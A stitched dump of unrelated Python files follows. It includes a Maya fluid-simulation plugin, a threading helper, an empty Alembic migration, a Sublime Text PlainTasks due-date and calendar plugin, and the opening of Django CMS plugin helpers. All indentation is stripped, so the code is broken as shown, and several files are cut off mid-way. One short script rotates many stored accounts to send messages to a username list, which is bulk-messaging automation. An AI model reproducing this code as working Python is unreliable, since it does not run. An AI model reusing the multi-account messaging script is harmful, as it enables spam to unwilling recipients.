cmds.menuItem( label='Create circular emitter',command='cmds.createCircularEmitter()' )
cmds.menuItem(divider=True)
cmds.menuItem( label='Create box animation field',command='cmds.createAnimationField(s=0)' )
cmds.menuItem( label='Create sphere animation field',command='cmds.createAnimationField(s=1)' )
cmds.menuItem( label='Create cylinder animation field',command='cmds.createAnimationField(s=2)' )
cmds.menuItem(divider=True)
cmds.menuItem( label='Save scene',command='cmds.saveModel()' )
cmds.menuItem(divider=True, dividerLabel="Import")
cmds.menuItem( label='Load rigid body data',command='cmds.loadRigidBodies()' )
######################################################
# deleteSPHMenu
######################################################
def deleteSPHMenu():
global menuId
cmds.deleteUI(menuId)
return
# Initialize the script plug-in
def initializePlugin(mobject):
global settingsWinId
global fluidWinId
global menuId
global fluidIds
global sphParameters
global fluidParameters
mplugin = OpenMayaMPx.MFnPlugin(mobject, "SPlisHSPlasH", "1.0", "Any")
settingsWinId = ""
fluidWinId = ""
menuId = ""
fluidIds = ["Fluid"]
try:
mplugin.registerNode( SPHConfigurationNode.kPluginNodeTypeName, SPHConfigurationNode.kPluginNodeId, SPHConfigurationNode.creator, SPHConfigurationNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerNode( SPHFluidConfigurationNode.kPluginNodeTypeName, SPHFluidConfigurationNode.kPluginNodeId, SPHFluidConfigurationNode.creator, SPHFluidConfigurationNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerNode( SPHFluidNode.kPluginNodeTypeName, SPHFluidNode.kPluginNodeId, SPHFluidNode.creator, SPHFluidNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerNode( SPHRigidBodyNode.kPluginNodeTypeName, SPHRigidBodyNode.kPluginNodeId, SPHRigidBodyNode.creator, SPHRigidBodyNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerCommand(createRectangularEmitterCmd.s_name, createRectangularEmitterCmd.creator)
mplugin.registerCommand(createCircularEmitterCmd.s_name, createCircularEmitterCmd.creator)
mplugin.registerCommand(saveModelCmd.s_name, saveModelCmd.creator)
mplugin.registerCommand(convertToFluidCmd.s_name, convertToFluidCmd.creator)
mplugin.registerCommand(convertToRigidBodiesCmd.s_name, convertToRigidBodiesCmd.creator)
mplugin.registerCommand(createAnimationFieldCmd.s_name, createAnimationFieldCmd.creator, createAnimationFieldCmd.syntaxCreator)
mplugin.registerCommand(loadRigidBodiesCmd.s_name, loadRigidBodiesCmd.creator)
except:
sys.stderr.write( "Failed to register nodes." )
raise
createSPHMenu()
# Uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
deleteSPHMenu()
try:
mplugin.deregisterCommand(createRectangularEmitterCmd.s_name)
mplugin.deregisterCommand(createCircularEmitterCmd.s_name)
mplugin.deregisterCommand(saveModelCmd.s_name)
mplugin.deregisterCommand(convertToFluidCmd.s_name)
mplugin.deregisterCommand(convertToRigidBodiesCmd.s_name)
mplugin.deregisterCommand(createAnimationFieldCmd.s_name)
mplugin.deregisterCommand(loadRigidBodiesCmd.s_name)
mplugin.deregisterNode( SPHRigidBodyNode.kPluginNodeId )
mplugin.deregisterNode( SPHFluidNode.kPluginNodeId )
mplugin.deregisterNode( SPHFluidConfigurationNode.kPluginNodeId )
mplugin.deregisterNode( SPHConfigurationNode.kPluginNodeId )
except:
sys.stderr.write( "Failed to deregister node")
raise
| nilq/baby-python | python |
from threading import current_thread
from threading import Thread as _Thread
class Thread(_Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None):
super().__init__(group, target, name, args, kwargs)
self.done = False
self.result = None
self.start()
def run(self):
try:
if self._target:
self.result = self._target(*self._args, **self._kwargs)
finally:
del self._target, self._args, self._kwargs
self.done = True
def join(self, timeout=None):
if not self._initialized:
raise RuntimeError("Thread.__init__() n t called")
if not self._started.is_set():
raise RuntimeError("cannot join thread before it is started")
if self is current_thread():
raise RuntimeError("cannot join current thread")
if timeout is None:
self._wait_for_tstate_lock()
else:
self._wait_for_tstate_lock(timeout=max(timeout, 0))
if self.done:
return self.result
def _chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
| nilq/baby-python | python |
"""baseline
Revision ID: bb972e06e6f7
Revises:
Create Date: 2020-01-22 23:03:09.267552
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bb972e06e6f7'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
pass
def downgrade():
pass
| nilq/baby-python | python |
# coding: utf-8
import sublime, sublime_plugin
import json
import re
import locale
import calendar
import itertools
from datetime import datetime
from datetime import timedelta
NT = sublime.platform() == 'windows'
ST3 = int(sublime.version()) >= 3000
if ST3:
from .APlainTasksCommon import PlainTasksBase, PlainTasksEnabled, PlainTasksFold
MARK_SOON = sublime.DRAW_NO_FILL
MARK_INVALID = sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SQUIGGLY_UNDERLINE
else:
from APlainTasksCommon import PlainTasksBase, PlainTasksEnabled, PlainTasksFold
MARK_SOON = MARK_INVALID = 0
sublime_plugin.ViewEventListener = object
try: # unavailable dependencies shall not break basic functionality
from dateutil import parser as dateutil_parser
from dateutil.relativedelta import relativedelta
except:
dateutil_parser = None
if ST3:
locale.setlocale(locale.LC_ALL, '')
def is_yearfirst(date_format):
return date_format.strip('( )').startswith(('%y', '%Y'))
def is_dayfirst(date_format):
return date_format.strip('( )').startswith(('%d'))
def _convert_date(matchstr, now):
match_obj = re.search(r'''(?mxu)
(?:\s*
(?P<yearORmonthORday>\d*(?!:))
(?P<sep>[-\.])?
(?P<monthORday>\d*)
(?P=sep)?
(?P<day>\d*)
(?! \d*:)(?# e.g. '23:' == hour, but '1 23:' == day=1, hour=23)
)?
\s*
(?:
(?P<hour>\d*)
:
(?P<minute>\d*)
)?''', matchstr)
year = now.year
month = now.month
day = int(match_obj.group('day') or 0)
# print(day)
if day:
year = int(match_obj.group('yearORmonthORday'))
month = int(match_obj.group('monthORday'))
else:
day = int(match_obj.group('monthORday') or 0)
# print(day)
if day:
month = int(match_obj.group('yearORmonthORday'))
if month < now.month:
year += 1
else:
day = int(match_obj.group('yearORmonthORday') or 0)
# print(day)
if 0 < day <= now.day:
# expect next month
month += 1
if month == 13:
year += 1
month = 1
elif not day: # @due(0) == today
day = now.day
# else would be day>now, i.e. future day in current month
hour = match_obj.group('hour') or now.hour
minute = match_obj.group('minute') or now.minute
hour, minute = int(hour), int(minute)
if year < 100:
year += 2000
# print(year, month, day, hour, minute)
return year, month, day, hour, minute
def convert_date(matchstr, now):
year = month = day = hour = minute = None
try:
year, month, day, hour, minute = _convert_date(matchstr, now)
date = datetime(year, month, day, hour, minute, 0)
except (ValueError, OverflowError) as e:
return None, (e, year, month, day, hour, minute)
else:
return date, None
def increase_date(view, region, text, now, date_format):
# relative from date of creation if any
if '++' in text:
line = view.line(region)
line_content = view.substr(line)
created = re.search(r'(?mxu)@created\(([\d\w,\.:\-\/ @]*)\)', line_content)
if created:
created_date, error = parse_date(created.group(1),
date_format=date_format,
yearfirst=is_yearfirst(date_format),
dayfirst=is_dayfirst(date_format),
default=now)
if error:
ln = (view.rowcol(line.a)[0] + 1)
print(u'\nPlainTasks:\nError at line %d\n\t%s\ncaused by text:\n\t"%s"\n' % (ln, error, created.group(0)))
sublime.status_message(u'@created date is invalid at line %d, see console for details' % ln)
else:
now = created_date
match_obj = re.search(r'''(?mxu)
\s*\+\+?\s*
(?:
(?P<number>\d*(?![:.]))\s*
(?P<days>[Dd]?)
(?P<weeks>[Ww]?)
(?! \d*[:.])
)?
\s*
(?:
(?P<hour>\d*)
[:.]
(?P<minute>\d*)
)?''', text)
number = int(match_obj.group('number') or 0)
days = match_obj.group('days')
weeks = match_obj.group('weeks')
hour = int(match_obj.group('hour') or 0)
minute = int(match_obj.group('minute') or 0)
if not (number or hour or minute) or (not number and (days or weeks)):
# set 1 if number is ommited, i.e.
# @due(+) == @due(+1) == @due(+1d)
# @due(+w) == @due(+1w)
number = 1
delta = error = None
amount = number * 7 if weeks else number
try:
delta = now + timedelta(days=(amount), hours=hour, minutes=minute)
except (ValueError, OverflowError) as e:
error = e, amount, hour, minute
return delta, error
def expand_short_date(view, start, end, now, date_format):
while view.substr(start) != '(':
start -= 1
while view.substr(end) != ')':
end += 1
region = sublime.Region(start + 1, end)
text = view.substr(region)
# print(text)
if '+' in text:
date, error = increase_date(view, region, text, now, date_format)
else:
date, error = parse_date(text,
date_format,
yearfirst=is_yearfirst(date_format),
dayfirst=is_dayfirst(date_format),
default=now)
return date, error, sublime.Region(start, end + 1)
def parse_date(date_string, date_format='(%y-%m-%d %H:%M)', yearfirst=True, dayfirst=False, default=None):
'''
Attempt to convert arbitrary string to datetime object
date_string
Unicode
date_format
Unicode
yearfirst
boolin
default
datetime object (now)
'''
#print("[date_string]", date_string, "[format] ", date_format)
try:
return datetime.strptime(date_string, date_format), None
except ValueError as e:
# print("[ValueError]:", e)
pass
bare_date_string = date_string.strip('( )')
items = len(bare_date_string.split('-' if '-' in bare_date_string else '.'))
try:
#[HKC] Initially it was < 3, but date_string of "233" will be converted to
# year of 0233, which is silly
if items == 1 and len(bare_date_string) <= 3:
raise Exception("Invalid date_string:", date_string)
if items < 2 and len(bare_date_string) < 3:
# e.g. @due(1) is always first day of next month,
# but dateutil consider it 1st day of current month
raise Exception("Special case of short date: less than 2 numbers")
if items < 3 and any(s in date_string for s in '-.'):
# e.g. @due(2-1) is always Fabruary 1st of next year,
# but dateutil consider it this year
raise Exception("Special case of short date: less than 3 numbers")
date = dateutil_parser.parse(bare_date_string,
yearfirst=yearfirst,
dayfirst=dayfirst,
default=default)
#print("[Parsed Date]", date)
if all((date.year < 1900, '%y' in date_format)):
return None, ('format %y requires year >= 1900', date.year, date.month, date.day, date.hour, date.minute)
except Exception as e:
#print("[Exception]:", e, "[date_string]:", date_string)
date, error = convert_date(bare_date_string, default)
else:
error = None
return date, error
def format_delta(view, delta):
delta -= timedelta(microseconds=delta.microseconds)
if view.settings().get('decimal_minutes', False):
days = delta.days
delta = u'%s%s%s%s' % (days or '', ' day, ' if days == 1 else '', ' days, ' if days > 1 else '', '%.2f' % (delta.seconds / 3600.0) if delta.seconds else '')
else:
delta = str(delta)
if delta[~7:] == ' 0:00:00' or delta == '0:00:00': # strip meaningless time
delta = delta[:~6]
elif delta[~2:] == ':00': # strip meaningless seconds
delta = delta[:~2]
return delta.strip(' ,')
class PlainTasksToggleHighlightPastDue(PlainTasksEnabled):
def run(self, edit):
highlight_on = self.view.settings().get('highlight_past_due', True)
self.view.erase_regions('past_due')
self.view.erase_regions('due_soon')
self.view.erase_regions('misformatted')
if not highlight_on:
return
pattern = r'@due(\([^@\n]*\))'
dates_strings = []
dates_regions = self.view.find_all(pattern, 0, '\\1', dates_strings)
if not dates_regions:
if ST3:
self.view.settings().set('plain_tasks_remain_time_phantoms', [])
return
past_due, due_soon, misformatted, phantoms = self.group_due_tags(dates_strings, dates_regions)
scope_past_due = self.view.settings().get('scope_past_due', 'string.other.tag.todo.critical')
scope_due_soon = self.view.settings().get('scope_due_soon', 'string.other.tag.todo.high')
scope_misformatted = self.view.settings().get('scope_misformatted', 'string.other.tag.todo.low')
icon_past_due = self.view.settings().get('icon_past_due', 'circle')
icon_due_soon = self.view.settings().get('icon_due_soon', 'dot')
icon_misformatted = self.view.settings().get('icon_misformatted', '')
self.view.add_regions('past_due', past_due, scope_past_due, icon_past_due)
self.view.add_regions('due_soon', due_soon, scope_due_soon, icon_due_soon, MARK_SOON)
self.view.add_regions('misformatted', misformatted, scope_misformatted, icon_misformatted, MARK_INVALID)
if not ST3:
return
if self.view.settings().get('show_remain_due', False):
self.view.settings().set('plain_tasks_remain_time_phantoms', phantoms)
else:
self.view.settings().set('plain_tasks_remain_time_phantoms', [])
def group_due_tags(self, dates_strings, dates_regions):
past_due, due_soon, misformatted, phantoms = [], [], [], []
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
yearfirst = is_yearfirst(date_format)
now = datetime.now()
default = now - timedelta(seconds=now.second, microseconds=now.microsecond) # for short dates w/o time
due_soon_threshold = self.view.settings().get('highlight_due_soon', 24) * 60 * 60
for i, region in enumerate(dates_regions):
if any(s in self.view.scope_name(region.a) for s in ('completed', 'cancelled')):
continue
text = dates_strings[i]
if '+' in text:
date, error = increase_date(self.view, region, text, default, date_format)
# print(date, date_format)
else:
date, error = parse_date(text,
date_format=date_format,
yearfirst=yearfirst,
dayfirst=is_dayfirst(date_format),
default=default)
# print(date, date_format, yearfirst)
if error:
# print(error)
misformatted.append(region)
else:
if now >= date:
past_due.append(region)
phantoms.append((region.a, '-' + format_delta(self.view, default - date)))
else:
phantoms.append((region.a, format_delta(self.view, date - default)))
if due_soon_threshold:
td = (date - now)
# timedelta.total_seconds() is not available in 2.6.x
time_left = (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.0**6
if time_left < due_soon_threshold:
due_soon.append(region)
return past_due, due_soon, misformatted, phantoms
class PlainTasksHLDue(sublime_plugin.EventListener):
def on_activated(self, view):
if not view.score_selector(0, "text.todo") > 0:
return
view.run_command('plain_tasks_toggle_highlight_past_due')
def on_post_save(self, view):
self.on_activated(view)
def on_load(self, view):
self.on_activated(view)
class PlainTasksFoldToDueTags(PlainTasksFold):
def run(self, edit):
if not self.view.settings().get('highlight_past_due', True):
return sublime.message_dialog('highlight_past_due setting must be true')
self.view.run_command('plain_tasks_toggle_highlight_past_due')
dues = sorted(self.view.line(r) for r in (self.view.get_regions('past_due') + self.view.get_regions('due_soon')))
if not dues:
return sublime.message_dialog('No overdue tasks.\nCongrats!')
self.exec_folding(self.add_projects_and_notes(dues))
class PlainTasksCalculateTotalTimeForProject(PlainTasksEnabled):
def run(self, edit, start):
line = self.view.line(int(start))
total, eol = self.calc_total_time_for_project(line)
if total:
self.view.insert(edit, eol, ' @total(%s)' % format_delta(self.view, total).rstrip(', '))
def calc_total_time_for_project(self, line):
pattern = r'(?<=\s)@(lasted|wasted|total)\([ \t]*(?:(\d+)[ \t]*days?,?)?[ \t]*((?:(\d+)\:(\d+)\:?(\d+)?)|(?:(\d+)\.(\d+)))?[ \t]*\)'
format = '{"days": "\\2", "hours": "\\4", "minutes": "\\5", "seconds": "\\6", "dhours": "\\7", "dminutes": "\\8"}'
lasted_strings = []
lasted_regions = self.view.find_all(pattern, 0, format, lasted_strings)
if not lasted_regions:
return 0, 0
eol = line.end()
project_block = self.view.indented_region(eol + 1)
total = timedelta()
for i, region in enumerate(lasted_regions):
if not all((region > line, region.b <= project_block.b)):
continue
t = json.loads(lasted_strings[i].replace('""', '"0"'))
total += timedelta(days=int(t['days']),
hours=int(t['hours']) or int(t['dhours']),
minutes=int(t['minutes']) or int(t['dminutes']) * 60,
seconds=int(t['seconds']))
return total, eol
class PlainTasksCalculateTimeForTask(PlainTasksEnabled):
def run(self, edit, started_matches, toggle_matches, now, eol, tag='lasted'):
'''
started_matches
list of Unicode objects
toggle_matches
list of Unicode objects
now
Unicode object, moment of completion or cancellation of a task
eol
int as str (abs. point of end of task line without line break)
tag
Unicode object (lasted for complete, wasted for cancelled)
'''
if not started_matches:
return
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
start = datetime.strptime(started_matches[0], date_format)
end = datetime.strptime(now, date_format)
toggle_times = [datetime.strptime(toggle, date_format) for toggle in toggle_matches]
all_times = [start] + toggle_times + [end]
pairs = zip(all_times[::2], all_times[1::2])
deltas = [pair[1] - pair[0] for pair in pairs]
delta = format_delta(self.view, sum(deltas, timedelta()))
tag = ' @%s(%s)' % (tag, delta.rstrip(', ') if delta else ('a bit' if '%H' in date_format else 'less than day'))
eol = int(eol)
if self.view.substr(sublime.Region(eol - 2, eol)) == ' ':
eol -= 2 # keep double whitespace at eol
self.view.insert(edit, eol, tag)
class PlainTasksReCalculateTimeForTasks(PlainTasksEnabled):
def run(self, edit):
started = r'^\s*[^\b]*?\s*@started(\([\d\w,\.:\-\/ @]*\)).*$'
toggle = r'@toggle(\([\d\w,\.:\-\/ @]*\))'
calculated = r'([ \t]@[lw]asted\([\d\w,\.:\-\/ @]*\))'
done = r'^\s*[^\b]*?\s*@(done|cancell?ed)[ \t]*(\([\d\w,\.:\-\/ @]*\)).*$'
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
default_now = datetime.now().strftime(date_format)
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
for line in regions:
current_scope = self.view.scope_name(line.a)
if not any(s in current_scope for s in ('completed', 'cancelled')):
continue
line_contents = self.view.substr(line)
done_match = re.match(done, line_contents, re.U)
now = done_match.group(2) if done_match else default_now
started_matches = re.findall(started, line_contents, re.U)
toggle_matches = re.findall(toggle, line_contents, re.U)
calc_matches = re.findall(calculated, line_contents, re.U)
for match in calc_matches:
line_contents = line_contents.replace(match, '')
self.view.replace(edit, line, line_contents)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.begin() + len(line_contents),
'tag': 'lasted' if 'completed' in current_scope else 'wasted'}
)
class PlainTaskInsertDate(PlainTasksBase):
def runCommand(self, edit, region=None, date=None):
if region:
y, m, d, H, M = date
region = sublime.Region(*region)
self.view.replace(edit, region, datetime(y, m, d, H, M, 0).strftime(self.date_format) + ' ')
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.view.line(region).b))
return
for s in reversed(list(self.view.sel())):
self.view.insert(edit, s.b, datetime.now().strftime(self.date_format))
class PlainTasksReplaceShortDate(PlainTasksBase):
def runCommand(self, edit):
s = self.view.sel()[0]
date, error, region = expand_short_date(self.view, s.a, s.b, datetime.now(), self.date_format)
if not date:
sublime.error_message(
'PlainTasks:\n\n'
'{0}:\n days:\t{1}\n hours:\t{2}\n minutes:\t{3}\n'.format(*error) if len(error) == 4 else
'{0}:\n year:\t{1}\n month:\t{2}\n day:\t{3}\n HH:\t{4}\n MM:\t{5}\n'.format(*error))
return
date = date.strftime(self.date_format)
self.view.replace(edit, region, date)
offset = region.a + len(date)
self.view.sel().clear()
self.view.sel().add(sublime.Region(offset, offset))
class PlainTasksViewEventListener(sublime_plugin.ViewEventListener):
@classmethod
def is_applicable(cls, settings):
return settings.get('syntax') in ('Packages/PlainTasks/PlainTasks.sublime-syntax', 'Packages/PlainTasks/PlainTasks.tmLanguage')
class PlainTasksPreviewShortDate(PlainTasksViewEventListener):
def __init__(self, view):
self.view = view
self.phantoms = sublime.PhantomSet(view, 'plain_tasks_preview_short_date')
def on_selection_modified_async(self):
self.phantoms.update([]) # https://github.com/SublimeTextIssues/Core/issues/1497
s = self.view.sel()[0]
if not (s.empty() and 'meta.tag.todo' in self.view.scope_name(s.a)):
return
rgn = self.view.extract_scope(s.a)
text = self.view.substr(rgn)
match = re.match(r'@due\(([^@\n]*)\)[\s$]*', text)
# print(s, rgn, text)
if not match:
return
# print(match.group(1))
preview_offset = self.view.settings().get('due_preview_offset', 0)
remain_format = self.view.settings().get('due_remain_format', '{time} remaining')
overdue_format = self.view.settings().get('due_overdue_format', '{time} overdue')
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
start = rgn.a + 5 # within parenthesis
now = datetime.now().replace(second=0, microsecond=0)
date, error, region = expand_short_date(self.view, start, start, now, date_format)
upd = []
if not error:
if now >= date:
delta = '-' + format_delta(self.view, now - date)
else:
delta = format_delta(self.view, date - now)
content = (overdue_format if '-' in delta else remain_format).format(time=delta.lstrip('-') or 'a little bit')
if content:
if self.view.settings().get('show_remain_due', False):
# replace existing remain/overdue phantom
phantoms = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
for index, (point, _) in enumerate(phantoms):
if point == region.a - 4:
phantoms[index] = [point, str(delta)]
self.view.settings().set('plain_tasks_remain_time_phantoms', phantoms)
break
else:
upd.append(sublime.Phantom(
sublime.Region(region.a - 4),
content,
sublime.LAYOUT_BELOW))
date = date.strftime(date_format).strip('()')
if date == match.group(1).strip():
self.phantoms.update(upd)
return
upd.append(sublime.Phantom(
sublime.Region(region.b - preview_offset),
date or (
'{0}:<br> days:\t{1}<br> hours:\t{2}<br> minutes:\t{3}<br>'.format(*error) if len(error) == 4 else
'{0}:<br> year:\t{1}<br> month:\t{2}<br> day:\t{3}<br> HH:\t{4}<br> MM:\t{5}<br>'.format(*error)),
sublime.LAYOUT_INLINE))
self.phantoms.update(upd)
class PlainTasksChooseDate(sublime_plugin.ViewEventListener):
def __init__(self, view):
self.view = view
@classmethod
def is_applicable(cls, settings):
return settings.get('show_calendar_on_tags')
def on_selection_modified_async(self):
s = self.view.sel()[0]
if not (s.empty() and any('meta.tag.todo ' in self.view.scope_name(n) for n in (s.a, s.a - 1))):
return
self.view.run_command('plain_tasks_calendar', {'point': s.a})
class PlainTasksCalendar(sublime_plugin.TextCommand):
def is_visible(self):
return ST3
def run(self, edit, point=None):
point = point or self.view.sel()[0].a
self.region, tag = self.extract_tag(point)
content = self.generate_calendar()
self.view.show_popup(content, sublime.COOPERATE_WITH_AUTO_COMPLETE, self.region.a, 555, 555, self.action)
def extract_tag(self, point):
'''point is cursor
Return tuple of two elements
Region
which will be replaced with chosen date, it may be parentheses belong to tag, or end of tag, or point
Unicode
tag under cursor (i.e. point)
'''
start = end = point
tag_pattern = r'(?<=\s)(\@[^\(\) ,\.]+)([\w\d\.\(\)\-!? :\+]*)'
line = self.view.line(point)
matches = re.finditer(tag_pattern, self.view.substr(line))
for match in matches:
m_start = line.a + match.start(1)
m_end = line.a + match.end(2)
if m_start <= point <= m_end:
start = line.a + match.start(2)
end = m_end
break
else:
match = None
tag = match.group(0) if match else ''
return sublime.Region(start, end), tag
def generate_calendar(self, date=None):
date = date or datetime.now()
y, m, d, H, M = date.year, date.month, date.day, date.hour, date.minute
content = ('<style> #today {{color: var(--background); background-color: var(--foreground)}}</style>'
'<br> <center><big>{prev_month} {next_month} {month}'
' {prev_year} {next_year} {year}</big></center><br><br>'
'{table}<br> {time}<br><br><hr>'
'<br> Click day to insert date '
'<br> into view, click month or '
'<br> time to switch the picker <br><br>'
)
locale.setlocale(locale.LC_ALL, '') # to get native month name
month = '<a href="month:{0}-{1}-{2}-{3}-{4}">{5}</a>'.format(y, m, d, H, M, date.strftime('%B'))
prev_month = '<a href="prev_month:{0}-{1}-{2}-{3}-{4}">←</a>'.format(y, m, d, H, M)
next_month = '<a href="next_month:{0}-{1}-{2}-{3}-{4}">→</a>'.format(y, m, d, H, M)
prev_year = '<a href="prev_year:{0}-{1}-{2}-{3}-{4}">←</a>'.format(y, m, d, H, M)
next_year = '<a href="next_year:{0}-{1}-{2}-{3}-{4}">→</a>'.format(y, m, d, H, M)
year = '<a href="year:{0}-{1}-{2}-{3}-{4}">{0}</a>'.format(y, m, d, H, M)
table = ''
for week in calendar.Calendar().monthdayscalendar(y, m):
row = ['']
for day in week:
link = '<a href="day:{0}-{1}-{2}-{3}-{4}"{5}>{2}</a>'.format(y, m, day, H, M, ' id="today"' if d == day else '')
cell = (' %s' % link if day < 10 else ' %s' % link) if day else ' '
row.append(cell)
table += ' '.join(row + ['<br><br>'])
time = '<a href="time:{0}-{1}-{2}-{3}-{4}">{5}</a>'.format(y, m, d, H, M, date.strftime('%H:%M'))
return content.format(
prev_month=prev_month, next_month=next_month, month=month,
prev_year=prev_year, next_year=next_year, year=year,
time=time, table=table)
def action(self, payload):
msg, stamp = payload.split(':')
def insert(stamp):
self.view.hide_popup()
y, m, d, H, M = (int(i) for i in stamp.split('-'))
self.view.run_command('plain_task_insert_date', {'region': (self.region.a, self.region.b), 'date': (y, m, d, H, M)})
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.region.b + 1))
def generate_months(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
months = ['<br>{5}<a href="year:{0}-{1}-{2}-{3}-{4}">{0}</a><br><br>'.format(y, m, d, H, M, ' ' * 8)]
for i in range(1, 13):
months.append('{6}<a href="calendar:{0}-{1}-{2}-{3}-{4}">{5}</a> '.format(y, i, d, H, M, datetime(y, i, 1, H, M, 0).strftime('%b'), '•' if i == m else ' '))
if i in (4, 8, 12):
months.append('<br><br>')
self.view.update_popup(''.join(months))
def generate_years(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
years = ['<br>']
for i in range(y - 6, y + 6):
years.append('{5}<a href="month:{0}-{1}-{2}-{3}-{4}">{0}</a> '.format(i, m, d, H, M, '•' if i == y else ' '))
if i in (y - 3, y + 1, y + 5):
years.append('<br><br>')
self.view.update_popup(''.join(years))
def generate_time(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
hours = ['<br> Hours:<br><br>']
for i in range(24):
hours.append('{6}{5}<a href="time:{0}-{1}-{2}-{3}-{4}">{3}</a> '.format(y, m, d, i, M, '•' if i == H else ' ', ' ' if i < 10 else ''))
if i in (7, 15, 23):
hours.append('<br><br>')
minutes = ['<br> Minutes:<br><br>']
for i in range(60):
minutes.append('{6}{5}<a href="time:{0}-{1}-{2}-{3}-{4}">{4}</a> '.format(y, m, d, H, i, '•' if i == M else ' ', ' ' if i < 10 else ''))
if i in (9, 19, 29, 39, 49, 59):
minutes.append('<br><br>')
confirm = ['<br> <a href="calendar:{0}-{1}-{2}-{3}-{4}">Confirm: {5}</a> <br><br>'.format(y, m, d, H, M, datetime(y, m, d, H, M, 0).strftime('%H:%M'))]
self.view.update_popup(''.join(hours + minutes + confirm))
def calendar(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
if m == 2 and d > 28:
d = 28
elif d == 31 and m in (4, 6, 9, 11):
d = 30
self.view.update_popup(self.generate_calendar(date=datetime(y, m, d, H, M, 0)))
def shift(stamp, month=0, year=0):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
date = datetime(y, m, d, H, M, 0) + relativedelta(months=month, years=year)
self.view.update_popup(self.generate_calendar(date))
case = {
'day': insert,
'month': generate_months,
'year': generate_years,
'time': generate_time,
'calendar': calendar,
'prev_month': lambda s=stamp: shift(s, month=-1),
'next_month': lambda s=stamp: shift(s, month=1),
'prev_year': lambda s=stamp: shift(s, year=-1),
'next_year': lambda s=stamp: shift(s, year=1)
}
self.view.update_popup('Loading...')
case[msg](stamp)
class PlainTasksRemain(PlainTasksViewEventListener):
def __init__(self, view):
self.view = view
self.phantom_set = sublime.PhantomSet(view, 'plain_tasks_remain_time')
self.view.settings().add_on_change('plain_tasks_remain_time_phantoms', self.check_setting)
self.phantoms = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
def check_setting(self):
'''add_on_change is issued on change of any setting in settings object'''
new_value = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
if self.phantoms == new_value:
return
self.phantoms = new_value
self.update()
def update(self):
self.phantoms = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
if not self.phantoms:
self.phantom_set.update([])
return
remain_format = self.view.settings().get('due_remain_format', '{time} remaining')
overdue_format = self.view.settings().get('due_overdue_format', '{time} overdue')
upd = []
for point, content in self.phantoms:
upd.append(sublime.Phantom(
sublime.Region(point),
(overdue_format if '-' in content else remain_format).format(time=content.lstrip('-') or 'a little bit'),
sublime.LAYOUT_BELOW))
self.phantom_set.update(upd)
def plugin_unloaded():
for window in sublime.windows():
for view in window.views():
view.settings().clear_on_change('plain_tasks_remain_time_phantoms')
| nilq/baby-python | python |
import json
from src import util
from threading import Thread
f = open('infos/accounts.json', )
accounts = json.load(f)
f = open('infos/config.json', )
config = json.load(f)
with open('infos/usernames.txt', 'r') as f:
usernames = [line.strip() for line in f]
usernamesForAccount = config["usernamesForAccount"]
capacity = len(accounts) * usernamesForAccount
toSent = len(usernames)
if capacity < toSent:
print('Problem pasi kemi ' + str(len(accounts)) + ' accounte')
print('Problem pasi kemi ' + str(len(accounts) * usernamesForAccount) + ' username mundesi per ti derguar mesazh')
print('Problem pasi kemi ' + str(len(usernames)) + ' qe duam ti dergojme mesazh')
print('Problem pasi kemi ' + str(
len(usernames) - (len(accounts) * usernamesForAccount)) + ' username pa i derguar mesazh')
exit()
buttons = []
threads = []
timewait = 5
for account in accounts:
timewait += 5
if not account.get('password'):
account['password'] = config["defaultAccountPassword"]
if not usernames:
break
usernamesForAccountList = list()
for i in range(usernamesForAccount):
if not usernames:
break
usernamesForAccountList.append(usernames.pop())
# util.send_messages(account, usernamesForAccountList)
# util.send_groupmessages(account, usernamesForAccountList)
t = Thread(target=util.send_messages,
args=(account, usernamesForAccountList, timewait,)) # get number for place in list `buttons`
threads.append(t)
buttons.append(False) # create place
for t in threads:
print(t.name)
t.start()
for t in threads:
print(t.name)
t.join()
| nilq/baby-python | python |
from collections import defaultdict
from datetime import timedelta
from django.contrib.sites.models import Site
from django.core import serializers
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import signals
from django.utils import timezone
from cms.models import CMSPlugin
from cms.utils import get_language_from_request
from .compat import CMS_GTE_36
from .utils import get_plugin_fields, get_plugin_model
def delete_plugins(placeholder, plugin_ids, nested=True):
# With plugins, we can't do queryset.delete()
# because this would trigger a bunch of internal
# cms signals.
# Instead, delete each plugin individually and turn off
# position reordering using the _no_reorder trick.
plugins = (
placeholder
.cmsplugin_set
.filter(pk__in=plugin_ids)
.order_by('-depth')
.select_related()
)
bound_plugins = get_bound_plugins(plugins)
for plugin in bound_plugins:
plugin._no_reorder = True
if hasattr(plugin, 'cmsplugin_ptr'):
plugin.cmsplugin_ptr._no_reorder = True
# When the nested option is False
# avoid queries by preventing the cms from
# recalculating the child counter of this plugin's
# parent (for which there's none).
plugin.delete(no_mp=not nested)
def get_bound_plugins(plugins):
plugin_types_map = defaultdict(list)
